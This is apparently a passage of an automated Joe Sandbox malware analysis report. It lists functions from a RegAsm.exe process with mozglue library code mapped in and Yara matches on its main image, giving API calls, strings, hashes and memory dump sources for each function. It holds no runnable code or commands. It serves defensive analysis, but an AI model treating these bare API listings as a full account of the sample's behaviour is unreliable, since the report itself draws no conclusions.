                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36014670B05381CFDF108FF8DA18A6237B5F70A318FD4093ADA0192B80DF34A455DA15
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F619
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C71F598), ref: 6C71F621
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F637
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F645
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F663
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C71F62A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                    • API String ID: 2848912005-753366533
                                                                                                                                                                                                                                                    • Opcode ID: 55c2b97494a9ca1b16f94f787884ce1c126c6afa6d3e74732b56121fa8f26270
                                                                                                                                                                                                                                                    • Instruction ID: 4913226cfabc9a04ce129b98ca8293d9da276ef662905cf584877c4551d0ad10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c2b97494a9ca1b16f94f787884ce1c126c6afa6d3e74732b56121fa8f26270
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0BE75304204ABDB006B65984CABA7BBDEB862ADF880036EA1583B41CF366C028760
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C70CFAE,?,?,?,6C6D31A7), ref: 6C7105FB
                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C70CFAE,?,?,?,6C6D31A7), ref: 6C710616
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6D31A7), ref: 6C71061C
                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6D31A7), ref: 6C710627
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _writestrlen
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                    • Opcode ID: 901ecf626b34889bfd0303fbcc3ac3fd3460694e035278359377ad3c440506a4
                                                                                                                                                                                                                                                    • Instruction ID: d2e19b51a16d5bf53d3ce7ffadafb05ee1242a6ba4ebe68d18057d4abc62ca40
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901ecf626b34889bfd0303fbcc3ac3fd3460694e035278359377ad3c440506a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44E08CE2A0101037F5142256AC8ADBB761DDBC6138F080039FD0D82301E94ABD1E51F7
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5daa9886696022d6eacc601a4d64767f1aa6aa3a3e9dd5f19a67070945f61fd7
                                                                                                                                                                                                                                                    • Instruction ID: 3364b71217a723858fd0f96aacdb2cf6fc8c9920d463a95785682abd14572bc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5daa9886696022d6eacc601a4d64767f1aa6aa3a3e9dd5f19a67070945f61fd7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95A147B0A056458FDB14CF29C984B9AFBF1BF4D304F54866ED44A97B40EB30AA45CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7314C5
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7314E2
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C731546
                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7315BA
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7316B4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1909280232-0
                                                                                                                                                                                                                                                    • Opcode ID: 0727e44c8b50f7780dd761c8be7dbbe5f6859bb634f832626c36cadcdabae851
                                                                                                                                                                                                                                                    • Instruction ID: 8d106a3ce02d97fb0958d528093e22647e2a2d008874558083f63fb278029f57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0727e44c8b50f7780dd761c8be7dbbe5f6859bb634f832626c36cadcdabae851
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70610171A007149BDB118F24C984BEEBBB5FF89308F44952CED8A57702DB35E949CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C72C1F1
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C72C293
                                                                                                                                                                                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C72C29E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: fgetc$memcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1522623862-0
                                                                                                                                                                                                                                                    • Opcode ID: eb9ab84d7dc5573d3a669fbba7cc4b35a0331e39f64bc6ea7f3216ec57c77c3d
                                                                                                                                                                                                                                                    • Instruction ID: eae0530acc4691eb2fcf4f184beaa5a83a45dc1ad54e41c4e44551a10e0b9f1c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb9ab84d7dc5573d3a669fbba7cc4b35a0331e39f64bc6ea7f3216ec57c77c3d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5361FB71A00208CFDB24DFA8D980AAEBBF1FF49316F144529E802A7651CB31E944CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C729FDB
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C729FF0
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C72A006
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C72A0BE
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C72A0D5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C72A0EB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                                                                                                    • Opcode ID: a1523d4e1798afab7dcf92415da25f16765259ff5023e5c4e7b8ce66e722d3cc
                                                                                                                                                                                                                                                    • Instruction ID: 1bb37419b131c3288b9317c4652a27e0a1f2c5e5878a9e6ad029b709c7587618
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1523d4e1798afab7dcf92415da25f16765259ff5023e5c4e7b8ce66e722d3cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B161A0759087019FC711CF18C58059AB7F5FF89328F54866DE8A99B702EB32E986CBC1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00411E90
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,00427158,?,?,?,00000000), ref: 00411EDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,0042715C,00000000,?,?,?,00000000), ref: 00411F22
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,00427160,?,?,?,00000000), ref: 00411F4E
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,00427164,?,?,?,00000000), ref: 00411F7A
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 00411FAC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strtok_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3330995566-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e3c077772cb1b54c778a9d9a72cb82904c094e46690486c00dcf859865b5ed7
                                                                                                                                                                                                                                                    • Instruction ID: e0a9f33a4a34958a6c202544b1f7cfd695b5de89789079ef0fe45b4d6ddf3efb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3c077772cb1b54c778a9d9a72cb82904c094e46690486c00dcf859865b5ed7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E419E74A04205DFC710DF59D844FF6B7A8FF09304F60466FE606932A0D778AA69CB59
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72DC60
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C72D38A,?), ref: 6C72DC6F
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C72D38A,?), ref: 6C72DCC1
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C72D38A,?), ref: 6C72DCE9
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C72D38A,?), ref: 6C72DD05
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C72D38A,?), ref: 6C72DD4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1842996449-0
                                                                                                                                                                                                                                                    • Opcode ID: eca8bf161384bb5bfa5d2012baf138bd11dd85b79b5889e60733cc144b6c07cc
                                                                                                                                                                                                                                                    • Instruction ID: e591bbbcf2d8b7b932c9f78089d16e600cc8c27d040d7f475871b0db05d72011
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eca8bf161384bb5bfa5d2012baf138bd11dd85b79b5889e60733cc144b6c07cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D41ACB5A00605CFCB00CFA9C984AAABBF6FF88314B554469D906ABB10DB35FC40CF94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 0041BB45
                                                                                                                                                                                                                                                      • Part of subcall function 0041A523: __mtinitlocknum.LIBCMT ref: 0041A539
                                                                                                                                                                                                                                                      • Part of subcall function 0041A523: __amsg_exit.LIBCMT ref: 0041A545
                                                                                                                                                                                                                                                      • Part of subcall function 0041A523: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082,?,?,0041918B,00000000,0042D448,004191D2,0040FB00), ref: 0041A54D
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(0042D3D0,00000020,0041BC88,00000000,00000001,00000000,?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D), ref: 0041BB81
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BB92
                                                                                                                                                                                                                                                      • Part of subcall function 0041B10A: EncodePointer.KERNEL32(00000000,0041ECDC,00640400,00000314,00000000,?,?,?,?,?,0041BE9F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B10C
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(-00000004,?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BBB8
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BBCB
                                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0041BCAA,000000FF,?,0041A54A,00000011,00000000,?,0041B191,0000000D,?,?,0041B5E5,0041A082), ref: 0041BBD5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2005412495-0
                                                                                                                                                                                                                                                    • Opcode ID: a1d53e66ac4443d2c4de71bdad7688b77588669171ed69ac1ce67625bd559654
                                                                                                                                                                                                                                                    • Instruction ID: 55ebfb874deead2f6fb9d722ab405013791dbb2abe2ba0218b52d44de12da04b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d53e66ac4443d2c4de71bdad7688b77588669171ed69ac1ce67625bd559654
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29313970A0031ADFEF10AFA5D9856DDBAB2FB09314F14402FE510A6261DBBC59D1CFA9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C72C82D
                                                                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C72C842
                                                                                                                                                                                                                                                      • Part of subcall function 6C72CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C74B5EB,00000000), ref: 6C72CB12
                                                                                                                                                                                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C72C863
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C72C875
                                                                                                                                                                                                                                                      • Part of subcall function 6C70B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C74B636,?), ref: 6C70B143
                                                                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C72C89A
                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C72C8BC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2745304114-0
                                                                                                                                                                                                                                                    • Opcode ID: 7cf136dce7fda523b1c8803b83e2f3e92088543170fa68f400222b67ca68ddb1
                                                                                                                                                                                                                                                    • Instruction ID: 76899da2c030f5767de576def5a2f5b9800e20b471cbfda266c4f848de8fe888
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf136dce7fda523b1c8803b83e2f3e92088543170fa68f400222b67ca68ddb1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8211B271B003099BCB00DFA5C9898BEBBB8FF89355F500139E60697381DF34A908CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041A91C
                                                                                                                                                                                                                                                      • Part of subcall function 0041B274: __getptd_noexit.LIBCMT ref: 0041B277
                                                                                                                                                                                                                                                      • Part of subcall function 0041B274: __amsg_exit.LIBCMT ref: 0041B284
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0041A93C
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 0041A94C
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0041A969
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0041A97C
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(0042E1C0), ref: 0041A994
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
